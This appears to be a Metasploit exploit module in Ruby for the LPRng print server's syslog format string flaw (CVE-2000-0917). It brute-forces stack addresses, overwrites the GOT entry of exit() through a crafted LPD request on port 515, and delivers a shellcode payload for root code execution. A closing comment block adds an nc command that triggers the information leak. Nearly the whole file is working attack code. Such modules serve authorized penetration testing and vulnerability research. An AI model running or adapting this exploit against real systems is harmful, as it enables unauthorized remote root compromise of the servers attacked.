##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
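class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute
  include Msf::Exploit::FormatString

  # Module metadata.
  #
  # Only one shipped target has been tested (Caldera OpenLinux 2.3). It keeps
  # the write destination fixed (the GOT slot of exit()) and brute-forces the
  # stack address of the payload through the Brute mixin's 'Bruteforce' range.
  # The "Debug" target uses addresses that cannot work, so the attempted write
  # can be observed in the target's syslog without gaining code execution.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
        'Description' => %q{
          This module exploits a format string vulnerability in the LPRng print server.
          This vulnerability was discovered by Chris Evans. There was a publicly
          circulating worm targeting this vulnerability, which prompted RedHat to pull
          their 7.0 release. They consequently re-released it as "7.0-respin".
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2000-0917' ],
          [ 'OSVDB', '421' ],
          [ 'BID', '1712' ],
          [ 'US-CERT-VU', '382365' ],
          [ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
          [ 'EDB', '226' ],
          [ 'EDB', '227' ],
          [ 'EDB', '230' ]
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_X86,
        'Privileged' => true, # root
        'DefaultOptions' => {
          'PrependSetresuid' => true
        },
        'Payload' => {
          # The request line has to hold the format string AND the payload;
          # 180 bytes is the observed buffer size on Caldera, ~50 go to fmt.
          'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)
          # NUL and newline terminate the request line, space splits it, and
          # '%' would be interpreted by the vulnerable syslog() call.
          'BadChars' => "\x00\x0a\x20\x25",
        },
        'Targets' => [
          # tested OK - jjd
          [
            'Caldera OpenLinux 2.3 Bruteforce',
            {
              'Platform' => 'linux',
              # number of stack slots to pop before reaching our buffer
              'NumPops' => 243,
              'FlowHook' => 0x80992d4, # GOT of exit
              # (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xcffffff4 },
                'Stop' => { 'Ret' => 0x7fffe004 },
                'Step' => 16
              }
            }
          ],
          # untested (from public exploits) -- kept for reference, not enabled:
          #
          # [ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
          #   {
          #     'NumPops' => 299,
          #     'Ret' => 0xbffff640,
          #     'FlowHook' => 0xbfffee30
          #   }
          # ],
          # [ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
          #   {
          #     'NumPops' => 304,
          #     'Ret' => 0xbffff920,
          #     'FlowHook' => 0xbffff0f0
          #   }
          # ],
          # [ 'RedHat 7.0 - Guinesss',
          #   {
          #     'NumPops' => 300,
          #     'Ret' => 0x41424344,
          #     'FlowHook' => 0xbffff3ec
          #   }
          # ],
          # [ 'RedHat 7.0 - Guinesss-dev',
          #   {
          #     'NumPops' => 300,
          #     'Ret' => 0x41424344,
          #     'FlowHook' => 0xbffff12c
          #   }
          # ],
          #
          # ...
          [
            'Debug',
            {
              'NumPops' => 1, # sure to miss.
              'Ret' => 0x41424344,
              'FlowHook' => 0x45464748
            }
          ]
        ],
        # 'DefaultTarget' => 0,
        'DisclosureDate' => '2000-09-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(515) ])
  end

  # Entry point. Switches the FormatString mixin to direct parameter access
  # (%N$...) format strings and then defers to the Brute mixin, which invokes
  # brute_exploit once per candidate 'Ret' address in the target's range.
  def exploit
    # we want to use DPA for this one :)
    fmtstr_set_caps(false, true)

    # Offset-discovery probe, kept for reference (disabled): send "%N$x" for
    # N = 1..400 and check syslog to see which index echoes the 41414141 marker.
    #
    # 400.times { |x|
    #   connect
    #   buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
    #   sock.put(buf)
    #   #handler
    #   disconnect
    # }

    print_status("Trying target #{target.name} ..")

    super
  end

  # One brute-force iteration, called by Msf::Exploit::Brute.
  #
  # Builds a single LPD request line whose format string overwrites
  # target['FlowHook'] with addrs['Ret'] (two 16-bit writes, both in the same
  # request), followed by the payload that the overwritten pointer is meant to
  # land in. Sends it, runs the payload handler and always closes the socket.
  #
  # @param addrs [Hash] the current candidate, keyed like 'Bruteforce'
  #   ('Ret' => Integer stack address being tried)
  def brute_exploit(addrs)
    # print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])

    # The vulnerable syslog() call prints this prefix in front of our data,
    # so the stack slot that maps to the start of our buffer lies past it.
    printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
    num_start = printed.length + 2 + 4

    # write 'ret' addr to flowhook (execute shellcode)
    # NOTE: the resulting two writes must be done at the same time

    # characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
    fmtbuf = "_" * 4
    fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
    # print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")

    # Append the payload and terminate the request line.
    #
    # An earlier revision sent "\x90" * 32 plus a dump of every non-badchar
    # byte here instead of the payload -- a debugging aid for spotting which
    # bytes syslog mangles -- which meant the module never delivered the
    # actual payload. Note the 'Bruteforce' 'Step' of 16 relies on the
    # encoded payload carrying a NOP sled; the framework is expected to pad
    # payload.encoded up to 'Space' with NOPs unless DisableNops is set --
    # TODO confirm on the framework version in use.
    fmtbuf << payload.encoded
    fmtbuf << "\n"

    print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])

    connect
    # Uncomment to give a debugger time to attach to the forked lpd child:
    # print_status("Sleeping, attach now!!")
    # select(nil,nil,nil,5)

    begin
      sock.put(fmtbuf)

      handler
    ensure
      # The Brute mixin calls this method hundreds of times; never leak the
      # socket when the write or the handler raises mid-iteration.
      disconnect
    end
  end
end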
=begin
171
172
HRM!
173
174
The following probe demonstrates the information leak: the "%x" conversions are expanded by the vulnerable syslog() path, and the output can be observed (here via nc piped into hexdump):
175
176
bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
177
178
There are various other ways to trigger the vulnerability: every LPD request starts with a
single-byte command code (0x01 through 0x09), and other commands may reach the same
logging path as the "bad request line" case used by this module.
180
181
It's unclear if there is a way to auto-detect the lpd version via LPD commands.
182
183
=end